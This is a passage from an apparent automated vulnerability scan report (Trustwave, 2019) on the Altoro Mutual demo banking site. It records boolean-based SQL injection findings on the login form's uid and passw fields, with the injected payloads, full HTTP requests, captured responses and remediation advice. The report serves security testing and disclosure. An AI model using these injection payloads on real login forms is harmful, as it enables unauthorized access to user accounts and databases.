<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 95 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 96 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 97 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
<span id="_ctl0__ctl0_Content_Administration">
<br style="line-height: 10px;"/>
<b>ADMINISTRATION</b>
<ul class="sidebar">
<li><a href="/admin/admin.jsp"
>Edit Users</a></li>
</ul>
</span>
</td>
<!-- MEMBER TOC END -->
<td valign="top" colspan="3" class="bb">
<p>
Welcome to Altoro Mutual Online.
</p>
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 98 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</select>
<input type="submit" id="btnGetAccount"
value=" GO ">
</td>
</tr>
<tr>
<td colspan="2"><span id="
_ctl0__ctl0_Content_Main_promo"><table width=590
border=0><tr><td><h2>Congratulations!
</h2></td></tr><tr><td>You have been pre-approved for an Altoro
Gold Visa with a credit limit of $10000!</td></tr><tr><td>Click <a
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 99 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</div>
</td>
</div>
</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
|
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
|
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
|
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
|
© 2019 Altoro Mutual, Inc.
<span style="color:red;font-weight:bold;font-style:italic;float:right"
>This web application is open source!<span style="color:black;font-
style:italic;font-weight:normal;float:right"> <a href="https:
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 100 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</body>
</html>
<!-- END FOOTER -->
False Request: POST https://demo.testfire.net/doLogin HTTP/1.1
Origin: https://demo.testfire.net
Upgrade-Insecure-Requests: 1
Referer: https://demo.testfire.net/login.jsp
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 101 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
uid=%27+or+8%3D6+--+-&passw=Passwor1&btnSubmit=Login
False Response: HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Transfer-Encoding: chunked
Date: Tue, 06 Aug 2019 04:31:39 GMT
<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 102 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 103 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 104 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 105 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 106 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</div>
<script type="text/javascript">
function setfocus() {
if (document.login.uid.value=="") {
document.login.uid.focus();
} else {
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 107 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
function confirminput(myform) {
if (myform.uid.value.length && myform.
passw.value.length) {
return (true);
} else if (!(myform.uid.value.length)) {
myform.reset();
myform.uid.focus();
alert ("You must enter a valid username");
return (false);
} else {
myform.passw.focus();
alert ("You must enter a valid password");
return (false);
}
}
window.onload = setfocus;
</script>
</td>
</div>
</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 108 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 109 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</body>
</html>
<!-- END FOOTER -->
Remediation:
This web site responded with content that suggests that the SQL
content injected was possibly interpreted by the SQL database engine,
indicating that the underlying web application may be vulnerable to
SQL Injection (SQLi). This vulnerability could be utilized by an attacker
to access, modify or delete sensitive information within the associated
database instance. Before accepting any user-supplied data, the
application should validate this data's format and reject any characters
that are not explicitly allowed (i.e. a white-list). This list should be as
restrictive as possible. This is particularly important when the original
source of data is beyond the control of the application.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 110 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:P/I:P/A:P
Service: https
Reference:
https://www.owasp.org/index.php/Guide_to_SQL_Injection
https://www.owasp.org/index.php/SQL_Injection
Evidence:
DetectionDetails: Boolean based SQL vulnerability found
POST - https://65.61.137.117:8443/doLogin - uid
False Injection: ' or 8=6 -- -
True Injection: ' or 8=8 -- -
True and false injections produced different responses
True Request: POST https://65.61.137.117:8443/doLogin HTTP/1.1
Origin: https://65.61.137.117:8443
Upgrade-Insecure-Requests: 1
Referer: https://65.61.137.117:8443/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 111 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 112 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 113 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 114 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
<span id="_ctl0__ctl0_Content_Administration">
<br style="line-height: 10px;"/>
<b>ADMINISTRATION</b>
<ul class="sidebar">
<li><a href="/admin/admin.jsp"
>Edit Users</a></li>
</ul>
</span>
</td>
<!-- MEMBER TOC END -->
<td valign="top" colspan="3" class="bb">
<p>
Welcome to Altoro Mutual Online.
</p>
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 115 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</select>
<input type="submit" id="btnGetAccount"
value=" GO ">
</td>
</tr>
<tr>
<td colspan="2"><span id="
_ctl0__ctl0_Content_Main_promo"><table width=590
border=0><tr><td><h2>Congratulations!
</h2></td></tr><tr><td>You have been pre-approved for an Altoro
Gold Visa with a credit limit of $10000!</td></tr><tr><td>Click <a
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 116 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</div>
</td>
</div>
</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
|
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
|
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
|
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
|
© 2019 Altoro Mutual, Inc.
<span style="color:red;font-weight:bold;font-style:italic;float:right"
>This web application is open source!<span style="color:black;font-
style:italic;font-weight:normal;float:right"> <a href="https:
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 117 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</body>
</html>
<!-- END FOOTER -->
False Request: POST https://65.61.137.117:8443/doLogin HTTP/1.1
Origin: https://65.61.137.117:8443
Upgrade-Insecure-Requests: 1
Referer: https://65.61.137.117:8443/login.jsp
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 118 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
uid=%27+or+8%3D6+--+-&passw=Passwor1&btnSubmit=Login
False Response: HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Transfer-Encoding: chunked
Date: Tue, 06 Aug 2019 04:38:32 GMT
<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 119 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 120 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 121 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 122 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 123 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</div>
<script type="text/javascript">
function setfocus() {
if (document.login.uid.value=="") {
document.login.uid.focus();
} else {
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 124 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
function confirminput(myform) {
if (myform.uid.value.length && myform.
passw.value.length) {
return (true);
} else if (!(myform.uid.value.length)) {
myform.reset();
myform.uid.focus();
alert ("You must enter a valid username");
return (false);
} else {
myform.passw.focus();
alert ("You must enter a valid password");
return (false);
}
}
window.onload = setfocus;
</script>
</td>
</div>
</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 125 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 126 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</body>
</html>
<!-- END FOOTER -->
Remediation:
This web site responded with content that suggests that the SQL
content injected was possibly interpreted by the SQL database engine,
indicating that the underlying web application may be vulnerable to
SQL Injection (SQLi). This vulnerability could be utilized by an attacker
to access, modify or delete sensitive information within the associated
database instance. Before accepting any user-supplied data, the
application should validate this data's format and reject any characters
that are not explicitly allowed (i.e. a white-list). This list should be as
restrictive as possible. This is particularly important when the original
source of data is beyond the control of the application.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 127 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:P/I:P/A:P
Service: https
Reference:
https://www.owasp.org/index.php/Guide_to_SQL_Injection
https://www.owasp.org/index.php/SQL_Injection
Evidence:
DetectionDetails: Boolean based SQL vulnerability found
POST - https://65.61.137.117:8443/doLogin - passw
False Injection: ' or 8=6 -- -
True Injection: ' or 8=8 -- -
True and false injections produced different responses
True Request: POST https://65.61.137.117:8443/doLogin HTTP/1.1
Origin: https://65.61.137.117:8443
Upgrade-Insecure-Requests: 1
Referer: https://65.61.137.117:8443/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 128 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 129 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
uid=CHSuser&passw=%27+or+8%3D6+--+-&btnSubmit=Login
False Response: HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Transfer-Encoding: chunked
Date: Tue, 06 Aug 2019 04:38:37 GMT
<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 130 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 131 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 132 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 133 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 134 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</div>
<script type="text/javascript">
function setfocus() {
if (document.login.uid.value=="") {
document.login.uid.focus();
} else {
document.login.passw.focus();
}
}
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 135 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
function confirminput(myform) {
if (myform.uid.value.length && myform.
passw.value.length) {
return (true);
} else if (!(myform.uid.value.length)) {
myform.reset();
myform.uid.focus();
alert ("You must enter a valid username");
return (false);
} else {
myform.passw.focus();
alert ("You must enter a valid password");
return (false);
}
}
window.onload = setfocus;
</script>
</td>
</div>
</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
|
<a id="HyperLink6" href="/index.jsp?content=security.htm"
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 136 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 137 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</body>
</html>
<!-- END FOOTER -->
Remediation:
This web site responded with content that suggests that the SQL
content injected was possibly interpreted by the SQL database engine,
indicating that the underlying web application may be vulnerable to
SQL Injection (SQLi). This vulnerability could be utilized by an attacker
to access, modify or delete sensitive information within the associated
database instance. Before accepting any user-supplied data, the
application should validate this data's format and reject any characters
that are not explicitly allowed (i.e. a white-list). This list should be as
restrictive as possible. This is particularly important when the original
source of data is beyond the control of the application.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 138 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:P/I:P/A:P
Service: https
Reference:
https://www.owasp.org/index.php/Guide_to_SQL_Injection
https://www.owasp.org/index.php/SQL_Injection
Evidence:
DetectionDetails: Boolean based SQL vulnerability found
POST - https://65.61.137.117/doLogin - uid
False Injection: ' or 8=6 -- -
True Injection: ' or 8=8 -- -
True and false injections produced different responses
True Request: POST https://65.61.137.117/doLogin HTTP/1.1
Origin: https://65.61.137.117
Upgrade-Insecure-Requests: 1
Referer: https://65.61.137.117/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded
uid=%27+or+8%3D8+--+-&passw=Passwor1&btnSubmit=Login
True Response: HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 139 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 140 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 141 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 142 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
<span id="_ctl0__ctl0_Content_Administration">
<br style="line-height: 10px;"/>
<b>ADMINISTRATION</b>
<ul class="sidebar">
<li><a href="/admin/admin.jsp"
>Edit Users</a></li>
</ul>
</span>
</td>
<!-- MEMBER TOC END -->
<td valign="top" colspan="3" class="bb">
<p>
Welcome to Altoro Mutual Online.
</p>
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 143 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</select>
<input type="submit" id="btnGetAccount"
value=" GO ">
</td>
</tr>
<tr>
<td colspan="2"><span id="
_ctl0__ctl0_Content_Main_promo"><table width=590
border=0><tr><td><h2>Congratulations!
</h2></td></tr><tr><td>You have been pre-approved for an Altoro
Gold Visa with a credit limit of $10000!</td></tr><tr><td>Click <a
href='apply.jsp'>Here</a> to apply.
</td></tr></table></span></td>
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 144 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</div>
</td>
</div>
</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
|
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
|
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
|
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
|
© 2019 Altoro Mutual, Inc.
<span style="color:red;font-weight:bold;font-style:italic;float:right"
>This web application is open source!<span style="color:black;font-
style:italic;font-weight:normal;float:right"> <a href="https:
//github.com/AppSecDev/AltoroJ/">Get your copy from GitHub</a> and
take advantage of advanced features</span></span>
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 145 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</body>
</html>
<!-- END FOOTER -->
False Request: POST https://65.61.137.117/doLogin HTTP/1.1
Origin: https://65.61.137.117
Upgrade-Insecure-Requests: 1
Referer: https://65.61.137.117/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 146 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
uid=%27+or+8%3D6+--+-&passw=Passwor1&btnSubmit=Login
False Response: HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Transfer-Encoding: chunked
Date: Tue, 06 Aug 2019 04:05:35 GMT
<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 147 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 148 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 149 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 150 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 151 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</div>
<script type="text/javascript">
function setfocus() {
if (document.login.uid.value=="") {
document.login.uid.focus();
} else {
document.login.passw.focus();
}
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 152 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
function confirminput(myform) {
if (myform.uid.value.length && myform.
passw.value.length) {
return (true);
} else if (!(myform.uid.value.length)) {
myform.reset();
myform.uid.focus();
alert ("You must enter a valid username");
return (false);
} else {
myform.passw.focus();
alert ("You must enter a valid password");
return (false);
}
}
window.onload = setfocus;
</script>
</td>
</div>
</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
|
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 153 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 154 of 1637
JS Int-B Roles 08052019.
